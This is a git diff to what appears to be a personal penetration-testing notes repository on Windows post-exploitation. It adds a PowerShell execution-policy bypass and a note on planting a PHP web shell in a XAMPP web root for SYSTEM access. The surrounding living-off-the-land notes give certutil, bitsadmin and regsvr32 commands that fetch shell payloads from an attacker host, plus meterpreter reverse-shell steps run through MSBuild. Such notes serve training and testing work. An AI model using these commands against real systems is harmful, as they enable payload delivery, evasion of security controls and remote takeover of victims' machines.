added xampp privilege escalation

Post Exploitation/Windows/Antivirus Evasion.md

@@ -81,6 +81,18 @@ AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
 AMSI_RESULT_DETECTED = 32768
 ```
 
+## PowerShell Policy Bypass
+
+```sh
+powershell -ExecutionPolicy Bypass
+```
+
+or just the following line
+
+```sh
+powershell -ep bypass
+```
+
 ### PowerShell Downgrade Attack
 
 * Downgrade Powershell version to 2.0, where no AMSI is implemented

Post Exploitation/Windows/Living off the Land.md

@@ -6,28 +6,35 @@
 
 ## Ingress Tool Transfer
 
-* [certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload encoding as well
+[certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload downloads and encoding
+
 ```sh
 certutil.exe -urlcache -split -f http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
 certutil.exe -encode shell.exe encoded-shell.txt
 ```
+
 * [bitsadmin](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin)
+
 ```sh
 bitsadmin.exe /transfer /download /priority foreground http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
 ```
+
 * findstr
+
 ```sh
 findstr /v dummystring  \\Path\to\shell.exe > C:\Windows\Temp\noshell.exe
 ```
 
 ## Indirect Command Execution
 
-* Explorer as parent process to execute other PEs
+Explorer as parent process to execute other PEs
+
 ```sh
 explorer /root, "C:\Windows\System32\cmd.exe"
 ```
 
-* Windows management instrumentation
+Windows management instrumentation
+
 ```sh
 wmic.exe process call create calc
 ```
@@ -38,10 +45,12 @@ wmic.exe process call create calc
 
 * `regsvr32.exe` can execute PEs in memory, even remotely
 * DLL has to match architecture
+
 ```sh
 C:\Windows\System32\regsvr32.exe C:\Temp\shell.dll
 C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shell.dll
 ```
+
 * `bash.exe -c calc.exe`
 
 ## Shortcut Modification Technique
@@ -51,10 +60,13 @@ C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shel
 * `msfvenom` with `windows/meterpreter/reverse_winhttps`
 * Set `multi/handler` with `set payload windows/meterpreter/reverse_winhttps`
 * Transform to `*.csproj` 
+
 ```sh
 python2 PowerLessShell.py -type powershell -source /tmp/shell.ps1 -output shell.csproj
 ```
+
 * Execute on target
+
 ```sh
 c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\shell.csproj
 ```

Post Exploitation/Windows/XAMPP.md

@@ -0,0 +1,9 @@
+# XAMPP
+
+## XAMPP on Windows
+
+There is a way to upload a shell to escalate to `nt authority\system`
+privileges through xampp. I used this multiple times in the last few days.
+Upload a PHP shell like [FOZZ's
+p0wny-shell](https://github.com/flozz/p0wny-shell.git) to the `C:\xampp\htdocs`
+directory and visit the resource in the browser.